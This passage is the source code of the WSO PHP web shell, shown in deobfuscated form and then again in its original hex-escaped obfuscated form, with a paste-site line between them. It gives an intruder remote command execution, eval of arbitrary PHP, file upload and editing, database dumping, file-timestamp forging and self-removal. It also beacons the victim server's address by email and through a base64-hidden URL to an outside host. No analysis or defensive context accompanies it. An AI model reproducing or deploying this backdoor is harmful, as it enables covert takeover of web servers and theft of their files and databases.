<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>\xa <td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>\xa <input type=hidden name=c value='" . $GLOBALS["cwd"] . "'>
<input type=hidden name=p1 value='uploadFile'>\xa <input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>"; } goto AjLS7; GEQIH: $to_email = "[email protected]"; goto LZD1D; APuMx: function actionFilesTools() { if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=" . basename($_POST["p1"])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die; } if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } wsoHeader(); echo "<h1>File tools</h1><div class=content>"; if (!file_exists(@$_POST["p1"])) { echo "File not exists"; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["p1"])); if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? wsoViewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . wsoPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch"); } else { $m = array("Chmod", "Rename", "Touch"); } foreach ($m as $v) { echo "<a href=# onclick="g(null,null,null,'" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } echo "<br><br>"; switch ($_POST["p2"]) { case "view": echo "<pre class=ml1>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</pre>"; break; case "highlight": if (@is_readable($_POST["p1"])) { echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; $code = @highlight_file($_POST["p1"], true); echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $code) . "</div>"; } break; case "chmod": if (!empty($_POST["p3"])) { $perms = 0; for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value=">>"></form>"; break; case "edit": if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } if (!empty($_POST["p3"])) { $time = @filemtime($_POST["p1"]); $_POST["p3"] = substr($_POST["p3"], 1); $fp = @fopen($_POST["p1"], "w"); if ($fp) { @fwrite($fp, $_POST["p3"]); @fclose($fp); echo "Saved!<br><script>p3_="";</script>"; @touch($_POST["p1"], $time, $time); } } echo "<form onsubmit="g(null,null,null,null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</textarea><input type=submit value=">>"></form>"; break; case "hexdump": $c = @file_get_contents($_POST["p1"]); $n = 0; $h = array("00000000<br>", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } $h[1] .= "<br>"; $h[2] .= "
"; } } echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#282828><pre>" . $h[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; break; case "rename": if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"")</script>"); } } echo "<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="" . htmlspecialchars($_POST["p1"]) . ""><input type=submit value=">>"></form>"; break; case "touch": if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value=">>"></form>"; break; } echo "</div>"; wsoFooter(); } goto IHC8D; AjLS7: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto SKJBT; PQ7mg: $color = "#00ff00"; goto YDIdN; Keq0A: function actionPhp() { if (isset($_POST["ajax"])) { $_SESSION[md5($_SERVER["HTTP_HOST"]) . "ajax"] = true; ob_start(); eval($_POST["p1"]); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd\x9\'\0") . "';
"; echo strlen($temp), "
", $temp; die; } wsoHeader(); if (isset($_POST["p2"]) && $_POST["p2"] == "info") { echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", '', $tmp); $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { $_SESSION[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false; } echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; echo " <input type=checkbox name=ajax value=1 " . ($_SESSION[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; if (!empty($_POST["p1"])) { ob_start(); eval($_POST["p1"]); echo htmlspecialchars(ob_get_clean()); } echo "</pre></div>"; wsoFooter(); } goto Q9S2h; ACsbt: $default_use_ajax = true; goto EB2md; uKoLR: $datasi = @fopen("js/js.php", "r"); goto WSK9t; C7Al9: function FetchURL($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, "{$cheader}"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $data = curl_exec($ch); if (!$data) { return false; } return $data; } goto FexA0; QwM1y: $home_cwd = @getcwd(); goto h3SJs; FexA0: die; goto X2GR2; kwWV5: function wsoHeader() { if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["default_charset"]; } global $color; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WSO " . WSO_VERSION . "</title>\xa<style>\xabody {background-color:#000;color:#fff;} \xabody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top; } \xaspan,h1,a{ color: {$color} !important; }
span{ font-weight: bolder; }
h1{ border:1px solid {$color};padding: 2px 5px;font: 14pt Verdana;margin:0px; }
div.content{ padding: 5px;margin-left:5px;}
a{ text-decoration:none; } \xaa:hover{ background:#ff0000; } \xa.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; } \xainput, textarea, select{ margin:0;color:#00ff00;background-color:#000;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; } \xaform{ margin:0px; } \xa#toolsTbl{ text-align:center; }
.toolsInp{ width: 80%; } \xa.main th{text-align:left;}
.main tr:hover{background-color:#5e5e5e;} \xa.main td, th{vertical-align:middle;}
pre{font-family:Courier,Monospace;}\xa#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} \xa</style>
<script>\xa var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';\xa var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'
var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';\xa var p1_ = '" . (strpos(@$_POST["p1"], "\xa") !== false ? '' : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "';\xa var p2_ = '" . (strpos(@$_POST["p2"], "
") !== false ? '' : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "';
var p3_ = '" . (strpos(@$_POST["p3"], "\xa") !== false ? '' : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "';\xa var d = document;\xa function set(a,c,p1,p2,p3,charset) {\xa if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\xa if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\xa if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\xa if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);\xa d.mf.submit();\xa }\xa function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';\xa for(i=0;i<d.mf.elements.length;i++)\xa params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);
}\xa function sr(url, params) {
if (window.XMLHttpRequest)\xa req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');\xa if (req) {\xa req.onreadystatechange = processReqChange;\xa req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}\xa function processReqChange() {\xa if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');\xa var arr=reg.exec(req.responseText);\xa eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>\xa<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>\xa \xa<input type=hidden name=p3>\xa<input type=hidden name=charset>
</form>"; $freeSpace = @diskfreespace($GLOBALS["cwd"]); $totalSpace = @disk_total_space($GLOBALS["cwd"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("r"); $kernel = @php_uname("s"); if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } $cwd_links = ''; $path = explode("/", $GLOBALS["cwd"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); $opt_charsets = ''; foreach ($charsets as $item) { $opt_charsets .= "<option value="" . $item . "" " . ($_POST["charset"] == $item ? "selected" : '') . ">" . $item . "</option>"; } $m = array("Sec Info" => "SecInfo", "Files" => "FilesMan", "Exec" => "Console", "Sql" => "Sql", "PHP Tools" => "phptools", "LFI" => "lfiscan", "Php" => "Php", "Safe mode" => "SafeMode", "String tools" => "StringTools", "XSS Shell" => "XSSShell", "Bruteforce" => "Bruteforce", "Network" => "Network"); if (!empty($GLOBALS["auth_pass"])) { $m["Logout"] = "Logout"; } $m["Self remove"] = "SelfRemove"; $menu = ''; foreach ($m as $k => $v) { $menu .= "<th width="" . (int) (100 / count($m)) . "%">[<a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a>]</th>"; } $drives = ''; if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "<a href="#" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } } echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " </nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=red>ON</font>" : "<font color=#00bb00><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . wsoViewSize($totalSpace) . " <span>Free:</span> " . wsoViewSize($freeSpace) . " (" . (int) ($freeSpace / $totalSpace * 100) . "%)<br>" . $cwd_links . " " . wsoPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">" . $opt_charsets . "</optgroup></select><br><span>Server IP:</span><br>" . @$_SERVER["SERVER_ADDR"] . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div style="margin:5">"; } goto u3Alk; Yc43E: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto f1qLZ; IRlis: function actionSelfRemove() { if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } if ($_POST["p1"] != "yes") { wsoHeader(); } echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; wsoFooter(); } goto cwENR; VYjv_: @mail($to_email, $server_mail, $linkcr, $header); goto omlKQ; f1qLZ: $from_shellcode = "3Turrshell@" . gethostbyname($_SERVER["SERVER_NAME"]) . ''; goto GEQIH; Xi_s3: $cwd = @getcwd(); goto POwAE; HrH07: @set_magic_quotes_runtime(0); goto dVexO; ktSrM: if (!isset($_SESSION[md5($_SERVER["HTTP_HOST"])])) { if (empty($auth_pass) || isset($_POST["pass"]) && md5($_POST["pass"]) == $auth_pass) { $_SESSION[md5($_SERVER["HTTP_HOST"])] = true; } else { wsoLogin(); } } goto VCV6q; hFBmU: if (empty($_POST["a"])) { if (isset($default_action) && function_exists("action" . $default_action)) { $_POST["a"] = $default_action; } else { $_POST["a"] = "SecInfo"; } } goto GAfOD; P0hHT: function actionLogout() { session_destroy(); die("bye!"); } goto IRlis; Ejazf: function actionphptools() { wsoHeader(); function GetIP() { if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif (getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); if (strstr($ip, ",")) { $tmp = explode(",", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("REMOTE_ADDR"); } return $ip; } $x = base64_decode("aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ==") . GetIP() . "-" . base64_encode("http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); };
?>Did this file decode correctly?
Original Code
<?php
goto Dam_K; DVeSk: function actionRC() { if (!@$_POST["\x70\61"]) { $a = array("\x75\x6e\141\155\145" => php_uname(), "\160\x68\x70\137\166\145\162\x73\x69\157\x6e" => phpversion(), "\167\x73\157\x5f\x76\x65\162\163\151\x6f\x6e" => WSO_VERSION, "\x73\141\x66\x65\155\157\144\145" => @ini_get("\163\141\146\145\x5f\155\x6f\144\x65")); echo serialize($a); } else { eval($_POST["\160\x31"]); } } goto hFBmU; lpEk_: function wsoEx($in) { $out = ''; if (function_exists("\x65\170\x65\143")) { @exec($in, $out); $out = @join("\12", $out); } elseif (function_exists("\160\141\163\163\164\x68\162\165")) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists("\x73\x79\163\x74\145\x6d")) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists("\x73\x68\145\154\x6c\x5f\x65\x78\145\x63")) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "\x72"))) { $out = ''; while (!@feof($f)) { $out .= fread($f, 1024); } pclose($f); } return $out; } goto uRnpW; nHI7I: function wsoPerms($p) { if (($p & 49152) == 49152) { $i = "\x73"; } elseif (($p & 40960) == 40960) { $i = "\x6c"; } elseif (($p & 32768) == 32768) { $i = "\55"; } elseif (($p & 24576) == 24576) { $i = "\x62"; } elseif (($p & 16384) == 16384) { $i = "\144"; } elseif (($p & 8192) == 8192) { $i = "\x63"; } elseif (($p & 4096) == 4096) { $i = "\x70"; } else { $i = "\x75"; } $i .= $p & 256 ? "\162" : "\55"; $i .= $p & 128 ? "\x77" : "\55"; $i .= $p & 64 ? $p & 2048 ? "\x73" : "\170" : ($p & 2048 ? "\123" : "\55"); $i .= $p & 32 ? "\162" : "\55"; $i .= $p & 16 ? "\x77" : "\x2d"; $i .= $p & 8 ? $p & 1024 ? "\163" : "\170" : ($p & 1024 ? "\123" : "\x2d"); $i .= $p & 4 ? "\x72" : "\x2d"; $i .= $p & 2 ? "\x77" : "\x2d"; $i .= $p & 1 ? $p & 512 ? "\164" : "\x78" : ($p & 512 ? "\124" : "\x2d"); return $i; } goto h18YW; xBzDj: function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "\x6d\x79\163\161\154": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "\160\147\163\x71\x6c": $host = explode("\x3a", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("\x68\157\x73\x74\75{$host[0]}\x20\160\x6f\x72\x74\x3d{$host[1]}\x20\x75\x73\145\162\x3d{$user}\40\x70\141\163\x73\x77\157\162\x64\x3d{$pass}\x20\144\142\x6e\x61\x6d\145\75{$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "\155\171\163\161\154": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "\x6d\171\163\x71\154": return $this->res = @mysql_query($str); break; case "\x70\x67\163\161\x6c": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "\x6d\x79\x73\161\154": return @mysql_fetch_assoc($res); break; case "\160\x67\x73\161\154": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "\x6d\171\x73\x71\154": return $this->query("\123\110\x4f\x57\40\x64\141\x74\x61\x62\141\163\145\163"); break; case "\160\x67\x73\x71\x6c": return $this->res = $this->query("\x53\x45\x4c\105\103\124\x20\x64\x61\164\156\x61\155\x65\x20\106\x52\117\115\x20\160\x67\137\x64\x61\164\x61\x62\141\x73\x65\x20\127\110\105\x52\105\x20\144\141\x74\151\163\x74\x65\x6d\x70\154\141\164\x65\x21\75\47\x74\47"); break; } return false; } function listTables() { switch ($this->type) { case "\155\x79\163\161\154": return $this->res = $this->query("\x53\x48\117\127\x20\x54\101\x42\x4c\x45\x53"); break; case "\x70\x67\163\161\154": return $this->res = $this->query("\163\145\x6c\x65\143\164\x20\x74\141\142\x6c\145\x5f\x6e\141\155\x65\40\x66\x72\x6f\155\x20\x69\x6e\x66\x6f\162\x6d\x61\164\x69\x6f\156\137\x73\143\x68\x65\155\141\56\164\x61\142\154\x65\x73\40\167\x68\x65\x72\145\40\x74\141\x62\x6c\x65\137\163\143\150\x65\155\141\x20\41\x3d\40\x27\x69\x6e\x66\157\162\155\141\164\151\157\156\137\163\143\x68\145\x6d\x61\47\x20\x41\116\104\40\x74\x61\142\154\x65\137\163\x63\150\145\x6d\141\x20\x21\x3d\40\47\x70\147\x5f\143\141\164\141\x6c\x6f\x67\47"); break; } return false; } function error() { switch ($this->type) { case "\155\x79\163\161\154": return @mysql_error(); break; case "\x70\147\163\161\x6c": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "\155\171\x73\161\154": if (function_exists("\x6d\x79\163\x71\x6c\137\163\x65\164\137\143\x68\141\162\x73\x65\x74")) { return @mysql_set_charset($str, $this->link); } else { $this->query("\123\x45\x54\40\x43\110\x41\122\x53\105\124\x20" . $str); } break; case "\160\x67\x73\161\x6c": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "\x6d\171\x73\x71\x6c": return $this->fetch($this->query("\123\x45\x4c\105\x43\124\x20\x4c\117\101\x44\x5f\106\x49\x4c\x45\50\47" . addslashes($str) . "\47\51\x20\141\163\40\146\x69\154\x65")); break; case "\x70\x67\x73\x71\x6c": $this->query("\103\x52\105\101\124\105\x20\x54\101\x42\x4c\x45\40\167\x73\x6f\x32\50\x66\151\x6c\145\x20\x74\x65\x78\164\51\x3b\x43\117\120\131\40\167\163\x6f\62\x20\x46\122\x4f\x4d\x20\47" . addslashes($str) . "\x27\x3b\163\x65\154\145\x63\164\x20\146\151\x6c\x65\x20\x66\162\x6f\x6d\x20\167\163\x6f\62\73"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["\x66\x69\x6c\145"]; } $this->query("\144\162\x6f\160\x20\164\141\x62\154\x65\40\167\163\157\x32"); return array("\146\x69\x6c\x65" => implode("\12", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "\x6d\x79\163\x71\154": $res = $this->query("\123\110\x4f\x57\x20\x43\x52\x45\x41\x54\105\x20\124\x41\102\x4c\x45\40\x60" . $table . "\x60"); $create = mysql_fetch_array($res); $sql = $create[1] . "\73\12"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("\x53\105\x4c\x45\x43\x54\40\52\40\106\122\117\115\40\x60" . $table . "\x60"); $head = true; while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { if ($v == null) { $item[$k] = "\x4e\125\114\114"; } elseif (is_numeric($v)) { $item[$k] = $v; } else { $item[$k] = "\x27" . @mysql_real_escape_string($v) . "\x27"; } $columns[] = "\x60" . $k . "\140"; } if ($head) { $sql = "\x49\x4e\x53\105\x52\x54\x20\111\x4e\124\117\40\x60" . $table . "\140\x20\x28" . implode("\x2c\40", $columns) . "\51\x20\x56\x41\114\125\x45\x53\x20\12\11\50" . implode("\x2c\40", $item) . "\x29"; $head = false; } else { $sql = "\12\11\54\x28" . implode("\54\x20", $item) . "\x29"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } if (!$head) { if ($fp) { fwrite($fp, "\x3b\12\12"); } else { echo "\73\12\xa"; } } break; case "\160\x67\x73\161\154": $this->query("\123\105\x4c\x45\103\124\x20\x2a\x20\106\122\x4f\115\x20" . $table); while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "\47" . addslashes($v) . "\47"; $columns[] = $k; } $sql = "\111\116\123\x45\122\124\40\x49\116\x54\117\x20" . $table . "\40\x28" . implode("\54\x20", $columns) . "\51\x20\x56\101\114\125\x45\x53\40\50" . implode("\54\40", $item) . "\x29\73" . "\xa"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["\164\x79\x70\x65"]); if (@$_POST["\x70\62"] == "\x64\157\167\x6e\154\x6f\141\x64") { $db->connect($_POST["\163\161\154\x5f\x68\157\x73\x74"], $_POST["\x73\x71\x6c\x5f\154\x6f\147\151\156"], $_POST["\x73\x71\x6c\x5f\160\x61\x73\x73"], $_POST["\163\x71\154\x5f\x62\141\163\x65"]); $db->selectdb($_POST["\163\161\x6c\x5f\142\141\x73\x65"]); switch ($_POST["\143\x68\141\162\x73\145\x74"]) { case "\x57\151\156\x64\157\167\x73\55\61\62\x35\x31": $db->setCharset("\143\x70\x31\x32\x35\61"); break; case "\125\x54\x46\x2d\70": $db->setCharset("\x75\164\x66\70"); break; case "\x4b\117\111\70\x2d\122": $db->setCharset("\153\157\151\x38\162"); break; case "\113\x4f\111\70\x2d\x55": $db->setCharset("\153\x6f\x69\x38\165"); break; case "\x63\160\x38\66\66": $db->setCharset("\143\160\70\x36\66"); break; } if (empty($_POST["\146\x69\x6c\145"])) { ob_start("\x6f\142\x5f\147\172\150\141\156\144\x6c\x65\162", 4096); header("\x43\157\156\164\145\156\x74\x2d\104\x69\x73\160\x6f\163\x69\164\151\157\x6e\72\x20\x61\164\164\x61\x63\x68\x6d\145\x6e\x74\73\x20\146\151\x6c\x65\x6e\141\155\x65\x3d\144\165\155\x70\x2e\x73\x71\x6c"); header("\x43\157\x6e\164\145\156\x74\x2d\x54\171\x70\145\72\x20\x74\145\170\x74\57\160\x6c\141\x69\156"); foreach ($_POST["\x74\142\154"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["\146\151\154\145"], "\x77")) { foreach ($_POST["\x74\x62\154"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["\x70\62"]); } else { die("\x3c\163\143\x72\151\160\x74\76\141\x6c\x65\x72\x74\50\x22\x45\x72\x72\157\162\41\40\103\x61\156\47\x74\x20\x6f\x70\x65\x6e\40\x66\151\x6c\x65\42\51\73\x77\151\x6e\144\157\x77\x2e\150\x69\x73\164\157\162\x79\x2e\x62\x61\x63\x6b\50\x2d\x31\x29\74\57\163\x63\x72\151\x70\x74\x3e"); } } wsoHeader(); echo 